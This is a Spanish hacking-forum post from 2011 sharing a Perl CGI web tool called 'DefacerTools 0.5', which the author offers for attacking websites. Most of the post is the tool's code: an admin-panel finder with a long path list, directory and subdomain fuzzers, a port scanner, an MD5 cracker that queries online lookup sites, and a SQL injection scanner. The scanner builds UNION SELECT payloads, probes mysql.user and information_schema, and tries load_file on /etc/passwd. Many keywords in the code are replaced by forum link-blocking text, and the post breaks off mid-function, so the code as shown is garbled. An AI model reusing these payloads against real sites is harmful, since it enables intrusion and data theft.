comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] DefacerTools 0.5 (regalo de navidad)

  • 0 Respuestas
  • 1484 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Diciembre 10, 2011, 09:33:45 am »
Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.

Las funciones del programa son :

  • HexConverter
  • PanelFinder
  • PathsFinder
  • SQLi Scanner
  • FuzzDNS
  • FinderPass
  • PortScanner


El codigo del programa (formateado con perltidy) es

defacertools.cgi

Código: Perl
  1. #!"\xampp\perl\bin\perl.exe"
  2. #
  3. #DefacerTools 0.5
  4. #
  5. #(C) Doddy Hackman 2012
  6. #
  7. #
  8.  
  9. use CGI;
  10. use LWP::UserAgent;
  11. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  12. use HTML::LinkExtor;
  13. use IO::Socket;
  14.  
  15. @panels = (
  16.     'admin/admin.asp',               'admin/login.asp',
  17.     'admin/index.asp',               'admin/admin.aspx',
  18.     'admin/login.aspx',              'admin/index.aspx',
  19.     'admin/webmaster.asp',           'admin/webmaster.aspx',
  20.     'asp/admin/index.asp',           'asp/admin/index.aspx',
  21.     'asp/admin/admin.asp',           'asp/admin/admin.aspx',
  22.     'asp/admin/webmaster.asp',       'asp/admin/webmaster.aspx',
  23.     'admin/',                        'login.asp',
  24.     'login.aspx',                    'admin.asp',
  25.     'admin.aspx',                    'webmaster.aspx',
  26.     'webmaster.asp',                 'login/index.asp',
  27.     'login/index.aspx',              'login/login.asp',
  28.     'login/login.aspx',              'login/admin.asp',
  29.     'login/admin.aspx',              'administracion/index.asp',
  30.     'administracion/index.aspx',     'administracion/login.asp',
  31.     'administracion/login.aspx',     'administracion/webmaster.asp',
  32.     'administracion/webmaster.aspx', 'administracion/admin.asp',
  33.     'administracion/admin.aspx',     'php/admin/',
  34.     'admin/admin.php',               'admin/index.php',
  35.     'admin/login.php',               'admin/system.php',
  36.     'admin/ingresar.php',            'admin/administrador.php',
  37.     'admin/default.php',             'administracion/',
  38.     'administracion/index.php',      'administracion/login.php',
  39.     'administracion/ingresar.php',   'administracion/admin.php',
  40.     'administration/',               'administration/index.php',
  41.     'administration/login.php',      'administrator/index.php',
  42.     'administrator/login.php',       'administrator/system.php',
  43.     'system/',                       'system/login.php',
  44.     'admin.php',                     'login.php',
  45.     'administrador.php',             'administration.php',
  46.     'administrator.php',             'admin1.html',
  47.     'admin1.php',                    'admin2.php',
  48.     'admin2.html',                   'yonetim.php',
  49.     'yonetim.html',                  'yonetici.php',
  50.     'yonetici.html',                 'adm/',
  51.     'admin/account.php',             'admin/account.html',
  52.     'admin/index.html',              'admin/login.html',
  53.     'admin/home.php',                'admin/controlpanel.html',
  54.     'admin/controlpanel.php',        'admin.html',
  55.     'admin/cp.php',                  'admin/cp.html',
  56.     'cp.php',                        'cp.html',
  57.     'administrator/',                'administrator/index.html',
  58.     'administrator/login.html',      'administrator/account.html',
  59.     'administrator/account.php',     'administrator.html',
  60.     'login.html',                    'modelsearch/login.php',
  61.     'moderator.php',                 'moderator.html',
  62.     'moderator/login.php',           'moderator/login.html',
  63.     'moderator/admin.php',           'moderator/admin.html',
  64.     'moderator/',                    'account.php',
  65.     'account.html',                  'controlpanel/',
  66.     'controlpanel.php',              'controlpanel.html',
  67.     'admincontrol.php',              'admincontrol.html',
  68.     'adminpanel.php',                'adminpanel.html',
  69.     'admin1.asp',                    'admin2.asp',
  70.     'yonetim.asp',                   'yonetici.asp',
  71.     'admin/account.asp',             'admin/home.asp',
  72.     'admin/controlpanel.asp',        'admin/cp.asp',
  73.     'cp.asp',                        'administrator/index.asp',
  74.     'administrator/login.asp',       'administrator/account.asp',
  75.     'administrator.asp',             'modelsearch/login.asp',
  76.     'moderator.asp',                 'moderator/login.asp',
  77.     'moderator/admin.asp',           'account.asp',
  78.     'controlpanel.asp',              'admincontrol.asp',
  79.     'adminpanel.asp',                'fileadmin/',
  80.     'fileadmin.php',                 'fileadmin.asp',
  81.     'fileadmin.html',                'administration.html',
  82.     'sysadmin.php',                  'sysadmin.html',
  83.     'phpmyadmin/',                   'myadmin/',
  84.     'sysadmin.asp',                  'sysadmin/',
  85.     'ur-admin.asp',                  'ur-admin.php',
  86.     'ur-admin.html',                 'ur-admin/',
  87.     'Server.php',                    'Server.html',
  88.     'Server.asp',                    'Server/',
  89.     'wp-admin/',                     'administr8.php',
  90.     'administr8.html',               'administr8/',
  91.     'administr8.asp',                'webadmin/',
  92.     'webadmin.php',                  'webadmin.asp',
  93.     'webadmin.html',                 'administratie/',
  94.     'admins/',                       'admins.php',
  95.     'admins.asp',                    'admins.html',
  96.     'administrivia/',                'Database_Administration/',
  97.     'WebAdmin/',                     'useradmin/',
  98.     'sysadmins/',                    'admin1/',
  99.     'system-administration/',        'administrators/',
  100.     'pgadmin/',                      'directadmin/',
  101.     'staradmin/',                    'ServerAdministrator/',
  102.     'SysAdmin/',                     'administer/',
  103.     'LiveUser_Admin/',               'sys-admin/',
  104.     'typo3/',                        'panel/',
  105.     'cpanel/',                       'cPanel/',
  106.     'cpanel_file/',                  'platz_login/',
  107.     'rcLogin/',                      'blogindex/',
  108.     'formslogin/',                   'autologin/',
  109.     'support_login/',                'meta_login/',
  110.     'manuallogin/',                  'simpleLogin/',
  111.     'loginflat/',                    'utility_login/',
  112.     'showlogin/',                    'memlogin/',
  113.     'members/',                      'login-redirect/',
  114.     'sub-login/',                    'wp-login/',
  115.     'login1/',                       'dir-login/',
  116.     'login_db/',                     'xlogin/',
  117.     'smblogin/',                     'customer_login/',
  118.     'UserLogin/',                    'login-us/',
  119.     'acct_login/',                   'admin_area/',
  120.     'bigadmin/',                     'project-admins/',
  121.     'phppgadmin/',                   'pureadmin/',
  122.     'sql-admin/',                    'radmind/',
  123.     'openvpnadmin/',                 'wizmysqladmin/',
  124.     'vadmind/',                      'ezsqliteadmin/',
  125.     'hpwebjetadmin/',                'newsadmin/',
  126.     'adminpro/',                     'Lotus_Domino_Admin/',
  127.     'bbadmin/',                      'vmailadmin/',
  128.     'Indy_admin/',                   'ccp14admin/',
  129.     'irc-macadmin/',                 'banneradmin/',
  130.     'sshadmin/',                     'phpldapadmin/',
  131.     'macadmin/',                     'administratoraccounts/',
  132.     'admin4_account/',               'admin4_colon/',
  133.     'radmind-1/',                    'Super-Admin/',
  134.     'AdminTools/',                   'cmsadmin/',
  135.     'SysAdmin2/',                    'globes_admin/',
  136.     'cadmins/',                      'phpSQLiteAdmin/',
  137.     'navSiteAdmin/',                 'server_admin_small/',
  138.     'logo_sysadmin/',                'server/',
  139.     'database_administration/',      'power_user/',
  140.     'system_administration/',        'ss_vms_admin_sm/'
  141. );
  142.  
  143. my @dns = ('www');
  144.  
  145. #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
  146.  
  147. my $nave = LWP::UserAgent->new;
  148. $nave->agent(
  149. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  150. );
  151. $nave->timeout(5);
  152.  
  153. my %rta;
  154.  
  155. my $que  = new CGI;
  156. my @ques = $que->param;
  157.  
  158. for (@ques) {
  159.     $rta{$_} = $que->param($_);
  160. }
  161.  
  162. You are not allowed to view links. Register or Login "Content-type:text/html\n\n";
  163. You are not allowed to view links. Register or Login "
  164.  
  165. <style type=text/css>
  166.  
  167.  
  168. .main {
  169. margin                  : -287px 0px 0px -490px;
  170. border                  : White solid 1px;
  171. BORDER-COLOR: #00FF00;
  172. }
  173.  
  174. #pie {
  175. position: absolute;
  176. bottom: 0;
  177. }
  178.  
  179. body,a:link {
  180. font: normal 16px Verdana, Arial, Helvetica,
  181. sans-serif;
  182. background-color: #000000;
  183. color:#00FF00;
  184. Courier New;
  185. cursor:crosshair;
  186. font-size: small;
  187. }
  188.  
  189. input,table.outset,table.bord,table,textarea,select {
  190. background-color:black;color:#00FF00;
  191. border: solid 1px #00FF00;
  192. border-color:#00FF00
  193. }
  194.  
  195. a:link,a:visited,a:active {
  196. color: #00FF00;
  197. font: normal 16px Verdana, Arial, Helvetica,
  198. sans-serif;
  199. text-decoration: none;
  200. }
  201.  
  202. </style>";
  203.  
  204. if ( $rta{'hex'} ) {
  205.     logouno();
  206.     You are not allowed to view links. Register or Login
  207. You are not allowed to view links. Register or Login(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
  208.     copyright();
  209. }
  210. elsif ( $rta{'textocode'} ) {
  211.     logouno();
  212.     You are not allowed to view links. Register or Login "[+] Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>";
  213.     You are not allowed to view links. Register or Login "</center>";
  214.     copyright();
  215. }
  216. elsif ( $rta{'panelfinder'} ) {
  217.     logodos();
  218.     You are not allowed to view links. Register or Login
  219. You are not allowed to view links. Register or Login(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
  220.     copyright();
  221. }
  222. elsif ( $rta{'buscarpanel'} ) {
  223.  
  224.     my $page = $rta{'buscarpanel'};
  225.     logodos();
  226.     You are not allowed to view links. Register or Login "<br>[+] Scanning $page<br><br>";
  227.     for $path (@panels) {
  228.         $code = tomax( $page . "/" . $path );
  229.         if ( $code->is_success ) {
  230.             You are not allowed to view links. Register or Login "[Link] : " . $page . "/" . $path . "<br>";
  231.         }
  232.     }
  233.     You are not allowed to view links. Register or Login "<br><br>[+] Finish<br>";
  234.     copyright();
  235. }
  236. elsif ( $rta{'pathsfinder'} ) {
  237.     logotres();
  238.     You are not allowed to view links. Register or Login
  239. You are not allowed to view links. Register or Login(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
  240.     copyright();
  241. }
  242. elsif ( $rta{'buscarpaths'} ) {
  243.     logotres();
  244.  
  245.     my $page = $rta{'buscarpaths'};
  246.  
  247.     my $code  = toma($page);
  248.     my @links = get_links($code);
  249.  
  250.     You are not allowed to view links. Register or Login "<br><br>[+] Finding paths<br><br>";
  251.  
  252.     for my $com (@links) {
  253.         my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  254.         if ( $path =~ /\/(.*)$/ ) {
  255.             my $path1 = $1;
  256.             $page =~ s/$path1//ig;
  257.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  258.             if ( $path =~ /(.*)\// ) {
  259.                 my $parche = $1;
  260.                 unless ( $repetidos =~ /$parche/ ) {
  261.                     $repetidos .= " " . $parche;
  262.                     my $code = toma( "http://" . $auth . $parche );
  263.  
  264.                     if ( $code =~ /Index of (.*)</ig ) {
  265.                         my $dir_found = $1;
  266.                         You are not allowed to view links. Register or Login $dir_found;
  267.                         You are not allowed to view links. Register or Login "[+] Directory Found : $page/$dir_found<br>";
  268.                     }
  269.                 }
  270.             }
  271.         }
  272.     }
  273.     You are not allowed to view links. Register or Login "<br><br>[+]Finished<br>";
  274.     copyright();
  275. }
  276. elsif ( $rta{'sqliscanner'} ) {
  277.     logocuatro();
  278.     You are not allowed to view links. Register or Login
  279. You are not allowed to view links. Register or Login(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
  280.     copyright();
  281. }
  282. elsif ( $rta{'buscarsql'} ) {
  283.     logocuatro();
  284.     You are not allowed to view links. Register or Login "<br><br>[+] Scanning page<br><br>";
  285.     &You are not allowed to view links. Register or Login( $rta{'buscarsql'} );
  286.     You are not allowed to view links. Register or Login "<br><br>[+] Finished";
  287.     copyright();
  288. }
  289. elsif ( $rta{'fuzzdns'} ) {
  290.     logocinco();
  291.     You are not allowed to view links. Register or Login
  292. You are not allowed to view links. Register or Login(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
  293.     copyright();
  294. }
  295. elsif ( $rta{'buscardns'} ) {
  296.     logocinco();
  297.  
  298.     my $page = $rta{'buscardns'};
  299.  
  300.     You are not allowed to view links. Register or Login "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>";
  301.     for my $path (@dns) {
  302.         $code = tomax( "http://" . $path . "." . $page );
  303.         if ( $code->is_success ) {
  304.             You are not allowed to view links. Register or Login "[+] Found : http://" . $path . "." . $page . "<br>";
  305.         }
  306.     }
  307.     You are not allowed to view links. Register or Login "<br><br>[+] Finished<br><br>";
  308.     copyright();
  309. }
  310. elsif ( $rta{'finderpass'} ) {
  311.     logoseis();
  312.     You are not allowed to view links. Register or Login
  313. You are not allowed to view links. Register or Login(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
  314.     copyright();
  315. }
  316. elsif ( $rta{'buscarhash'} ) {
  317.     logoseis();
  318.     &crackit( $rta{'buscarhash'} );
  319.     copyright();
  320. }
  321. elsif ( $rta{'portscanner'} ) {
  322.     logosiete();
  323.     You are not allowed to view links. Register or Login
  324. You are not allowed to view links. Register or Login(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
  325.     copyright();
  326. }
  327. elsif ( $rta{'buscarpuertos'} ) {
  328.     logosiete();
  329.     scanuno( $rta{'buscarpuertos'} );
  330.     copyright();
  331. }
  332. elsif ( $rta{'home'} ) {
  333.     sintax();
  334. }
  335. else {
  336.     sintax();
  337. }
  338.  
  339. sub sintax {
  340.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  341. <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
  342. <br><br>
  343. <h1><center>DefacerTools</center></h1>
  344. <br><br>
  345. <center>
  346. <table border=1>
  347. <td class=main><center><b>Tools</b></center></td><tr>
  348. <td class=main><a href=?You are not allowed to view links. Register or Login=true><center>HexConverter</center></a></td><tr>
  349. <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
  350. <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
  351. <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
  352. <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
  353. <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
  354. <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
  355. </table>
  356. </center>      
  357. );
  358. }
  359.  
  360. sub logouno {
  361.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  362. <center>
  363. <pre>
  364.  
  365.  
  366.  
  367.  @    @                 @@@@                                        
  368.  @    @                @    @                            @          
  369.  @    @                @                                 @          
  370.  @    @   @@@  @  @    @       @@@  @ @@  @   @  @@@  @@ @@  @@@  @@
  371.  @@@@@@  @   @ @  @    @      @   @ @@  @ @   @ @   @ @  @  @   @ @
  372.  @    @  @@@@@  @@     @      @   @ @   @  @ @  @@@@@ @  @  @@@@@ @
  373.  @    @  @      @@     @      @   @ @   @  @ @  @     @  @  @     @
  374.  @    @  @   @ @  @    @    @ @   @ @   @   @   @   @ @  @  @   @ @
  375.  @    @   @@@  @  @     @@@@   @@@  @   @   @    @@@  @   @  @@@  @
  376.  
  377.  
  378.  
  379.  
  380. </pre>
  381.  
  382.  
  383. );
  384. }
  385.  
  386. sub logodos {
  387.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  388. <center>
  389. <pre>
  390.  
  391.  
  392.  
  393.  @@@@@                    @ @@@@@ @           @        
  394.  @    @                   @ @                 @        
  395.  @    @                   @ @                 @        
  396.  @    @  @@@  @ @@   @@@  @ @     @ @ @@   @@@@  @@@  @@
  397.  @@@@@      @ @@  @ @   @ @ @@@@  @ @@  @ @   @ @   @ @
  398.  @       @@@@ @   @ @@@@@ @ @     @ @   @ @   @ @@@@@ @
  399.  @      @   @ @   @ @     @ @     @ @   @ @   @ @     @
  400.  @      @   @ @   @ @   @ @ @     @ @   @ @   @ @   @ @
  401.  @       @@@@ @   @  @@@  @ @     @ @   @  @@@@  @@@  @
  402.  
  403.  
  404.  
  405.  
  406. </pre>
  407.  
  408.  
  409. );
  410. }
  411.  
  412. sub logotres {
  413.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  414. <center>
  415. <pre>
  416.  
  417.  
  418.  
  419.  @@@@@           @          @@@@@ @           @        
  420.  @    @       @  @          @                 @        
  421.  @    @       @  @          @                 @        
  422.  @    @  @@@  @@ @ @@   @@  @     @ @ @@   @@@@  @@@  @@
  423.  @@@@@      @ @  @@  @ @  @ @@@@  @ @@  @ @   @ @   @ @
  424.  @       @@@@ @  @   @  @   @     @ @   @ @   @ @@@@@ @
  425.  @      @   @ @  @   @   @  @     @ @   @ @   @ @     @
  426.  @      @   @ @  @   @ @  @ @     @ @   @ @   @ @   @ @
  427.  @       @@@@  @ @   @  @@  @     @ @   @  @@@@  @@@  @
  428.  
  429.  
  430.  
  431.  
  432.  
  433. </pre>
  434.  
  435.  
  436. );
  437. }
  438.  
  439. sub logocuatro {
  440.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  441. <center>
  442. <pre>
  443.  
  444.  
  445.  
  446.   @@@    @@@@   @     @      @@@                                  
  447.  @   @  @    @  @     @     @   @                                  
  448.  @      @    @  @     @     @                                      
  449.  @      @    @  @     @     @       @@@   @@@  @ @@  @ @@   @@@  @@
  450.   @@@   @    @  @     @      @@@   @   @     @ @@  @ @@  @ @   @ @
  451.      @  @    @  @     @         @  @      @@@@ @   @ @   @ @@@@@ @
  452.      @  @  @ @  @     @         @  @     @   @ @   @ @   @ @     @
  453.  @   @  @   @@  @     @     @   @  @   @ @   @ @   @ @   @ @   @ @
  454.   @@@    @@@@   @@@@@ @      @@@    @@@   @@@@ @   @ @   @  @@@  @
  455.              @                                                    
  456.  
  457.  
  458.  
  459.  
  460.  
  461. </pre>
  462.  
  463.  
  464. );
  465. }
  466.  
  467. sub logocinco {
  468.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  469. <center>
  470. <pre>
  471.  
  472.  
  473.  
  474.  @@@@@                    @@@@    @    @   @@@
  475.  @                        @   @   @@   @  @   @
  476.  @                        @    @  @@   @  @    
  477.  @     @   @ @@@@ @@@@    @    @  @ @  @  @    
  478.  @@@@  @   @    @    @    @    @  @ @  @   @@@
  479.  @     @   @   @    @     @    @  @  @ @      @
  480.  @     @   @  @    @      @    @  @   @@      @
  481.  @     @  @@ @    @       @   @   @   @@  @   @
  482.  @      @@ @ @@@@ @@@@    @@@@    @    @   @@@
  483.  
  484.  
  485.  
  486.  
  487.  
  488.  
  489. </pre>
  490.  
  491.  
  492. );
  493. }
  494.  
  495. sub logoseis {
  496.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  497. <center>
  498. <pre>
  499.  
  500.  
  501.  
  502.  @@@@@ @           @          @@@@@                
  503.  @                 @          @    @                
  504.  @                 @          @    @                
  505.  @     @ @ @@   @@@@  @@@  @@ @    @  @@@   @@   @@
  506.  @@@@  @ @@  @ @   @ @   @ @  @@@@@      @ @  @ @  @
  507.  @     @ @   @ @   @ @@@@@ @  @       @@@@  @    @  
  508.  @     @ @   @ @   @ @     @  @      @   @   @    @
  509.  @     @ @   @ @   @ @   @ @  @      @   @ @  @ @  @
  510.  @     @ @   @  @@@@  @@@  @  @       @@@@  @@   @@
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517.  
  518. </pre>
  519.  
  520.  
  521. );
  522. }
  523.  
  524. sub logosiete {
  525.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  526. <center>
  527. <pre>
  528.  
  529.  
  530.  
  531.  @@@@@               @@@                                  
  532.  @    @          @  @   @                                  
  533.  @    @          @  @                                      
  534.  @    @  @@@  @@ @@ @       @@@   @@@  @ @@  @ @@   @@@  @@
  535.  @@@@@  @   @ @  @   @@@   @   @     @ @@  @ @@  @ @   @ @
  536.  @      @   @ @  @      @  @      @@@@ @   @ @   @ @@@@@ @
  537.  @      @   @ @  @      @  @     @   @ @   @ @   @ @     @
  538.  @      @   @ @  @  @   @  @   @ @   @ @   @ @   @ @   @ @
  539.  @       @@@  @   @  @@@    @@@   @@@@ @   @ @   @  @@@  @
  540.  
  541.  
  542.  
  543.  
  544.  
  545.  
  546.  
  547.  
  548. </pre>
  549.  
  550.  
  551. );
  552. }
  553.  
  554. sub copyright {
  555.     You are not allowed to view links. Register or Login
  556. You are not allowed to view links. Register or Login(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
  557. }
  558.  
  559. sub You are not allowed to view links. Register or Login {
  560.     You are not allowed to view links. Register or Login "<br>[+] Looking for the number of columns<br><br>";
  561.     my $rows = "0";
  562.     my $asc;
  563.     my $page = $_[0];
  564.     ( $pass1, $pass2 ) = &bypass( $_[1] );
  565.  
  566.     $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  567.     $total = "1";
  568.     for my $rows ( 2 .. 200 ) {
  569.         $asc .=
  570.           "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  571.         $total .= "," . $rows;
  572.         $injection =
  573.             $page . "1"
  574.           . $pass1 . "and"
  575.           . $pass1 . "1=0"
  576.           . $pass1 . "union"
  577.           . $pass1
  578.           . "select"
  579.           . $pass1
  580.           . $alert
  581.           . $asc;
  582.         $test = toma($injection);
  583.         if ( $test =~ /RATSXPDOWN/ ) {
  584.             @number = $test =~ You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  585.             $control = 1;
  586.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  587.             my $save = $auth;
  588.             $total =~ s/$number[0]/hackman/;
  589.             You are not allowed to view links. Register or Login "[SQLI] : "
  590.               . $page . "1"
  591.               . $pass1 . "and"
  592.               . $pass1 . "1=0"
  593.               . $pass1 . "union"
  594.               . $pass1
  595.               . "select"
  596.               . $pass1
  597.               . $total . "<br>";
  598.             details(
  599.                 $page . "1"
  600.                   . $pass1 . "and"
  601.                   . $pass1 . "1=0"
  602.                   . $pass1 . "union"
  603.                   . $pass1
  604.                   . "select"
  605.                   . $pass1
  606.                   . $total,
  607.                 "--", ""
  608.             );
  609.         }
  610.     }
  611. }
  612.  
  613. sub details {
  614.     my ( $page, $bypass, $save ) = @_;
  615.     ( $pass1, $pass2 ) = &bypass($bypass);
  616.     if ( $page =~ /(.*)hackman(.*)/ig ) {
  617.         You are not allowed to view links. Register or Login "<br>[+] Searching information..<br><br>";
  618.         my ( $start, $end ) = ( $1, $2 );
  619.         $inforschema =
  620.             $start
  621.           . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  622.           . $end
  623.           . $pass1 . "from"
  624.           . $pass1
  625.           . "information_schema.tables"
  626.           . $pass2;
  627.         $mysqluser =
  628.             $start
  629.           . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  630.           . $end
  631.           . $pass1 . "from"
  632.           . $pass1
  633.           . "mysql.user"
  634.           . $pass2;
  635.         $test3 =
  636.           toma( $start
  637.               . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  638.               . $end
  639.               . $pass2 );
  640.         $test1 = toma($inforschema);
  641.         $test2 = toma($mysqluser);
  642.         if ( $test2 =~ /ERTOR854/ig ) {
  643.             You are not allowed to view links. Register or Login "[mysql.user] : ON<br>";
  644.         }
  645.         else {
  646.             You are not allowed to view links. Register or Login "[mysql.user] : OFF<br>";
  647.         }
  648.         if ( $test1 =~ /ERTOR854/ig ) {
  649.             You are not allowed to view links. Register or Login "[information_schema.tables] : ON<br>";
  650.         }
  651.         else {
  652.             You are not allowed to view links. Register or Login "[information_schema.tables] : OFF<br>";
  653.         }
  654.         if ( $test3 =~ /ERTOR854/ig ) {
  655.             You are not allowed to view links. Register or Login "[load_file] : ON<br>";
  656.         }
  657.         $concat =
  658. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  659.         $injection = $start . $concat . $end . $pass2;
  660.         $code      = toma($injection);
  661.         if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
  662.             You are not allowed to view links. Register or Login
  663. "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
  664.         }
  665.         else {
  666.             You are not allowed to view links. Register or Login "<br>[-] Not found any data<br>";
  667.         }
  668.     }
  669. }
  670.  
  671. sub encode {
  672.     my $string = $_[0];
  673.     $hex = '0x';
  674.     for ( You are not allowed to view links. Register or Login //, $string ) {
  675.         $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  676.     }
  677.     You are not allowed to view links. Register or Login $hex;
  678. }
  679.  
  680. sub bypass {
  681.     if    ( $_[0] eq "/*" )  { You are not allowed to view links. Register or Login ( "/**/", "/**/" ); }
  682.     elsif ( $_[0] eq "%20" ) { You are not allowed to view links. Register or Login ( "%20",  "%00" ); }
  683.     else                     { You are not allowed to view links. Register or Login ( "+",    "--" ); }
  684. }
  685.  
  686. sub ascii {
  687.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',', You are not allowed to view links. Register or Login "U*", $_[0];
  688. }
  689.  
  690. sub toma {
  691.     You are not allowed to view links. Register or Login $nave->get( $_[0] )->content;
  692. }
  693.  
  694. sub tomax {
  695.     You are not allowed to view links. Register or Login $nave->get( $_[0] );
  696. }
  697.  
  698. sub get_links {
  699.  
  700.     $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  701.     You are not allowed to view links. Register or Login @links;
  702.  
  703.     sub agarrar {
  704.         my ( $a, %b ) = @_;
  705.         You are not allowed to view links. Register or Login( @links, You are not allowed to view links. Register or Login %b );
  706.     }
  707. }
  708.  
  709. sub crackit {
  710.  
  711.     my $secret = $_[0];
  712.  
  713.     You are not allowed to view links. Register or Login "<br><br>[+] Cracking $_[0]<br><br>";
  714.  
  715.     my %hash = (
  716.  
  717.         'http://passcracking.com/' => {
  718.             'tipo'      => 'post',
  719.             'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
  720.             'regex' =>
  721. '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  722.         },
  723.         'http://md5.hashcracking.com/search.php?md5=' => {
  724.             'tipo'  => 'get',
  725.             'regex' => 'Cleartext of $_[0] is (.*)',
  726.         },
  727.         'http://www.bigtrapeze.com/md5/' => {
  728.             'tipo'      => 'post',
  729.             'variables' => '{"query" => $_[0], "submit" => " Crack "}',
  730.             'regex' =>
  731. 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  732.         },
  733.         'http://opencrack.hashkiller.com/' => {
  734.             'tipo' => 'post',
  735.             'variables' =>
  736.               '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  737.             'regex' => You are not allowed to view links. Register or Login(<\/div><div class="result">$_[0]:(.+)<br\/>),
  738.         },
  739.         'http://www.hashchecker.com/index.php?_sls=search_hash' => {
  740.             'tipo'      => 'post',
  741.             'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
  742.             'regex' =>
  743. '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  744.         },
  745.         'http://victorov.su/md5/?md5e=&md5d=' => {
  746.             'tipo'  => 'get',
  747.             'regex' => You are not allowed to view links. Register or Login(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  748.        }
  749.    );
  750.  
  751.    for my $data ( keys %hash ) {
  752.  
  753.        if ( $hash{$data}{tipo} eq "get" ) {
  754.            $code = toma( $data . $_[0] );
  755.            if ( $code =~ /$hash{$data}{regex}/ig ) {
  756.                print "<br>[+] Decoded : " . $1 . "<br><br>";
  757.                print $secret. ":" . $1 . "<br>";
  758.            }
  759.        }
  760.        else {
  761.            $code = tomar( $data, $hash{$data}{variables} );
  762.            if ( $code =~ /$hash{$data}{regex}/ig ) {
